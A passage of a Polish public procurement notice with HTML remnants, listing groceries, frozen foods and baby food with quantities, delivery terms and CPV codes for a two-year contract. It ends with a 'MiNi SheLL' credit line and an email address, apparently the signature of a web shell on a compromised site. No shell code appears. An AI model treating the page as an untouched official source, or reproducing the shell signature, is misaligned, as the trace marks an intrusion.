28.	Kasza jęczmienna średnia wielkość opakowania jednostkowego max 500g	1680kg
29.	Kasza manna błyskawiczna-wielkość opakowania max-1kg	3600kg
30.	Kasza gryczana  niepalona wielkość opakowania jednostkowego max-5kg	480kg
31.	Ryż -biały długoziarnisty wielkość opakowania jednostkowego max -1kg	6000kg
32.	Płatki jęczmienne błyskawiczne wielkość opakowania jednostkowego max-1kg 	3200kg
33.	Makarony z mąki wyprodukowanej z pszenicy durum, o zawartości białka 12g i powyżej na 100g produktu (nitki, świderki, muszle , wstążki) w opakowaniach jednostkowych max-1kg	6000kg
34.	Mąka pszenna typ 500 wielkość opakowania jednostkowego max-1kg	6000kg
35.	Mąka ziemniaczana- wielkość opakowania jednostkowego max-1kg	360kg
36.	Mąka kukurydziana-wielkość opakowania jednostkowego max-500g	72kg
37.	Kleik ryżowy- wielkość opakowania jednostkowego max-200g	264kg
38.	Mleko w proszku- wielkość opakowania jednostkowego max-1kg	30kg
39.	Drożdże spożywcze wielkość opakowania jednostkowego- 100g	48kg
40.	Kisiel owocowy bez zawartości cukru różne smaki wielkość opakowania jednostkowego max-70g	360kg
41.	Budyń waniliowy lub śmietankowy bez zawartości cukru wielkość opakowania jednostkowego max-70g	288kg
42.	Galaretka owocowa różne smaki wielkość opakowania jednostkowego max-85g	168kg
43.	Kwasek cytrynowy wielkość opakowania jednostkowego max-50g	42kg
44.	Pieprz czarny mielony wielkość opakowania jednostkowego max-25g	80kg
45.	Przyprawa warzywna w proszku lub granulkach wielkość opakowania jednostkowego max-100g	420kg
46.	Kostki rosołowe (drobiowe, wołowe)wielkość opakowania jednostkowego max-80g	408kg
47.	Cukier wanilinowy wielkość opakowania jednostkowego max-40g	36kg
48.	Czosnek suszony granulowany wielkość opakowania jednostkowego max-25g	48kg
49.	Liść laurowy wielkość opakowania jednostkowego max-20g	20kg
50.	Ziele angielskie wielkość opakowania jednostkowego max-20g	40kg
51.	Papryka mielona ostra wielkość opakowania jednostkowego max-20g	20kg
52.	Majeranek wielkość opakowania jednostkowego max-20g	30kg
53.	Imbir mielony wielkość opakowania jednostkowego max-20g	2kg
54.	Gałka muszkatołowa mielona wielkość opakowania jednostkowego max-20g	2kg
55.	Bazylia mielona wielkość opakowania jednostkowego max-20g	2kg
56.	Oregano mielone wielkość opakowania jednostkowego max-20g	2kg
57.	Przyprawa do kurczaka mielona wielkość opakowania jednostkowego max-60g	17kg
58.	Przyprawa gros wielkość opakowania jednostkowego max-40g	2kg
59.	Barszcz biały - bez konserwantów  bez dodatku ekstraktu drożdży wielkość opakowania jednostkowego max-80g	24kg
60.	Barszcz czerwony-o zawartości suszonego koncentratu buraka czerwonego powyżej 14% wielkość opakowania jednostkowego max-60g	24kg
61.	Żelatyna spożywcza wielkość opakowania jednostkowego max-60g	12kg
62.	Sól kuchenna -warzona, jodowana wielkość opakowania jednostkowego max-1kg	3600kg
63.	Koncentrat pomidorowy  30 % wielkość opakowania jednostkowego max-200g	1080kg
64.	Majonez -o zawartości tłuszczu od 60g i powyżej w 100g produktu wielkość opakowania jednostkowego max-250g	480kg
65.	Ocet 10% wielkość opakowania jednostkowego max-0.5L	100l
66.	Ketchup -o zawartości pomidorów powyżej 120g w 100g ketchupu wielkość opakowania jednostkowego max-500g 	72kg
67.	Musztarda stołowa  wielkość opakowania jednostkowego max-500g 	240kg
68.	Musztarda stołowa  wielkość opakowania max-210g	200kg
69.	Chrzan tarty wielkość opakowania jednostkowego max-250g	360kg
70.	Proszek do pieczenia wielkość opakowania jednostkowego max-40g	6kg
71.	 Cukier kryształ- wielkość opakowania max-1kg	12000kg
72.	Glukoza- wielkość opakowania jednostkowego  max-200g	14kg
73.	Cukier puder wielkość opakowania jednostkowego max-500g	24kg
74.	 Olej rzepakowy wielkość  opakowania jednostkowego max-1L	1200l
75.	Olej słonecznikowy wielkość opakowania jednostkowego max-1L	1200l
76.	Aromat do ciast wielkość opakowania jednostkowego max-10g 	150szt
Warunki dostawy artykułów spożywczych:
a) ) dostawa towaru nie częściej niż 1 raz w tygodniu
b) Nie zamówienie poszczególnego asortymentu w danym miesiącu nie jest w żadnym przypadku odstąpieniem od umowy .
c) dostawa w ciągu 48 godz. od dnia złożenia zamówienia- dni robocze (magazyn czynny w godz. 8:00- 15:00).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.89.10.00-8, 15.89.80.00-9, 15.60.00.00-4, 13.33.00.00-0, 15.41.11.00-3, 15.87.12.50-1, 15.87.12.30-5, 15.87.12.73-8, 15.83.12.00-4, 15.86.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mrożonki warzywne, rybne i mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 2- Mrożonki warzywne, rybne i mięsne
Lp.	Nazwa artykułu	Orientacyjna ilość
w okresie 2 lat/j.m.
1.	2.	3.
1.	Marchew mrożona  wielkość opakowania jednostkowego max-0.50kg	300kg
2.	Mieszanka warzywna wieloskładnikowa składnikowa wielkość opakowania jednostkowego max-0.50kg	480kg
3.	Ryba mrożona Mintaj  warstwy filetów przełożone folią wielkość opakowania tafla od 5-7kg 	480kg
4.	Ryba mrożona Dorsz, warstwy filetów przełożone folią wielkość opakowania tafla od 5-7kg	480kg
5.	Kalafior mrożony  wielkość opakowania jednostkowego max-0.50kg	240kg
6.	Fasolka mrożona -wielkość opakowania jednostkowego max-0.50kg	300kg
7.	Porzeczka czarna mrożona -wielkość opakowania jednostkowego max-2.50kg	1440kg
8.	Truskawki mrożone wielkość opakowania jednostkowego max-2.50kg	480kg
9.	Pyzy mrożone bez mięsa -wielkość opakowania jednostkowego max-0.50kg	840kg
10.	Frytki mrożone wielkość opakowania jednostkowego max-2.50kg	1200kg
11.	Flaki wołowe parzone krojone wielkość opakowania max-1kg	480kg
12.	 Hamburger waga  od50g-60g jednej sztuki	90kg
13.	Śledź płaty marynowane w zalewie grejpfrutowej wielkość opakowania jednostkowego max-4kg	192kg
Warunki dostawy:
a) towar określony w pozycjach :
-	1  zamawiany będzie w miesiącach: maj, czerwiec lipiec
-	2 zamawiany będzie w miesiącach: kwiecień, maj, czerwiec lipiec
-	3 i 13 zamawiany będzie od września do maja
-	Pozostałe towary będą zamawiane sukcesywnie przez okres obowiązywanie umowy, (nie zamówienie poszczególnego asortymentu wdanym miesiącu nie jest w żadnym przypadku odstąpieniem od umowy )
b) dostawa towaru na zamówienie- nie częściej niż 1 raz w tygodniu
c) dostawa w ciągu 48 godz. od dnia złożenia zamówienia- dni robocze (magazyn czynny w godz. 8:00-15:00)
d) do każdej dostawy zostanie załączony aktualny handlowy dokument  identyfikacyjny zgodnie 
z ustawą z dnia 16 grudnia 2005r o produktach pochodzenia zwierzęcego (Dz.U.2006, nr 17. poz. 127) oraz Rozporządzeniem WE 853/2004 Parlamentu Europejskiego i Rady z dnia 29.04.2004 ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz.U. UE L139 z dnia 30.04.2004).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3, 15.33.11.70-9, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Produkty spożywcze dla niemowlaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres nr 3- Produkty spożywcze dla niemowlaków
Lp.	Nazwa artykułu	Orientacyjna ilość
w okresie 2 lat/j.m.
1.	2.	3.
1.	Jabłuszko (przecier) po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	2400 szt.
2.	Jabłko z marchewką po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	1200 szt.
3.	Marchewka po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	720 szt.
4.	Zupka jarzynowa z warzywami i ryżem po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	960 szt.
5.	Jabłko z bananem lub brzoskwinią  lub jagodą po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	2400 szt.
6.	Kaszka do picia mleczno-ryżowo- kukurydziana jagodą po 4 miesiącu życia dziecka, w kartoniku wielkość opakowania jednostkowego max. 250ml	4800 szt.
7.	Marchewka z ryżem jagodą po 4 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	1200 szt.
8.	Zupa jarzynowa z kurczakiem lub indykiem lub królikiem , po 5 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 150g	2400 szt.
9.	Ryż z mięsem i z warzywami po 12 miesiącu życia dziecka, opakowanie szklane , wielkość opakowania jednostkowego max. 250g	480 szt.
10.	Mleko w proszku z kleikiem ryżowym po 6 miesiącu życia dziecka, w kartoniku , wielkość opakowania jednostkowego max. 350g	60 szt. 
11.	Herbatka granulat  od 1 miesiąca życia- koper włoski, w puszce wielkość opakowania jednostkowego max. 200g	48 szt.
12.	 Herbatka granulat  od 1 miesiąca życia- rumianek, w puszce wielkość opakowania jednostkowego max. 200g	48 szt.
13.	Kleik ryżowy po 4 miesiącu życia dziecka, opakowanie typu paczka szklane , wielkość opakowania jednostkowego max. 180g	24 szt.
14.	Woda mineralna niegazowana 	720 szt. 
15.	Herbata ekspresowa ( czarna), w pudełku po 100 torebek	24 szt. 
Woda mineralna niegazowana z poz. nr 14 musi posiadać certyfikat Instytutu Matki i Dziecka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.88.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com